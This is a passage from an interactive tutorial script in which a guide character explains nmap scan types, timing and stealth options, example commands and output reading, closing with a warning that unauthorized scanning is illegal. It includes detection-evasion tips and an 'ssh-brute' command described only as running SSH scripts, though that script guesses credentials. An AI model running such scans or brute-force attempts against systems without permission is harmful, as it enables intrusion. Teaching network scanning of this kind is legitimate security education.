`nmap -A 192.168.1.1` gives you comprehensive information
* [What are the different scan types?]
-> nmap_scan_types
* [Show me more examples]
-> nmap_examples
* [Explain ports again]
-> nmap_ports_explained
* [I'm ready to practice]
-> nmap_end
// ----------------
// Scan types
// ----------------
=== nmap_scan_types ===
Guide: nmap offers different scan types for different situations:
Guide: **TCP Connect Scan** (`-sT`):
The default if you're not root. Completes full TCP handshake. Reliable but noisy—easy to detect and log.
Guide: **SYN Scan** (`-sS`):
The "stealth scan"—sends SYN packets but doesn't complete the handshake. Faster and less detectable. Requires root privileges. This is the default if you run nmap as root.
Guide: **UDP Scan** (`-sU`):
Scans UDP ports instead of TCP. Slower and less reliable, but important because many services use UDP (DNS, SNMP, DHCP).
Example: `nmap -sU 192.168.1.1`
Guide: **Version Detection** (`-sV`):
Not just "port 80 is open" but "Apache httpd 2.4.41 is running on port 80". Crucial for identifying vulnerabilities.
Guide: **Aggressive Scan** (`-A`):
Enables OS detection, version detection, script scanning, and traceroute. Comprehensive but very noisy.
Guide: **Timing** (`-T0` through `-T5`):
Controls scan speed. `-T0` (paranoid) is extremely slow and stealthy. `-T4` (aggressive) is fast but noisy. `-T3` (normal) is the default.
* [Show me practical examples]
-> nmap_examples
* [How do I scan for open ports?]
-> nmap_basic_scan
* [What are ports again?]
-> nmap_ports_explained
* [I understand now]
-> nmap_end
// ----------------
// Practical examples
// ----------------
=== nmap_examples ===
Guide: Let's walk through practical scenarios:
Guide: **Scenario 1: Quick network check**
`nmap 192.168.1.0/24`
Scans all 256 addresses in your local network to see what's alive and what common ports are open.
Guide: **Scenario 2: Thorough single host scan**
`nmap -sV -sC -O -p- 192.168.1.50`
Scans all 65,535 ports, detects service versions, runs default scripts, and attempts OS detection. Takes longer but gives comprehensive results.
Guide: **Scenario 3: Stealth scan of web services**
`nmap -sS -p 80,443 -T2 192.168.1.50`
SYN scan of web ports with slower timing to avoid detection.
Guide: **Scenario 4: Quick vulnerability check**
`nmap -sV --script vuln 192.168.1.50`
Runs vulnerability detection scripts against identified services.
Guide: **Scenario 5: Check specific service**
`nmap -p 22 --script ssh-brute 192.168.1.50`
Scans port 22 and runs SSH-specific scripts.
Guide: **Reading the output:**
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9
80/tcp open http Apache httpd 2.4.41
3306/tcp closed mysql
8080/tcp filtered http-proxy
```
Guide: - **open**: Service is listening and accepting connections
- **closed**: Port is accessible but no service is listening
- **filtered**: Firewall or filter is blocking access
* [Tell me about scan types]
-> nmap_scan_types
* [Explain the basics again]
-> nmap_basic_scan
* [What are ports?]
-> nmap_ports_explained
* [I'm ready to use nmap]
-> nmap_end
// ----------------
// End
// ----------------
=== nmap_end ===
Guide: Remember: nmap is powerful, but scanning networks you don't own or have permission to test is illegal.
Guide: Always get written authorization before scanning. "I thought it was okay" is not a legal defense.
Guide: Use nmap responsibly. It's a professional tool that requires professional ethics.
-> END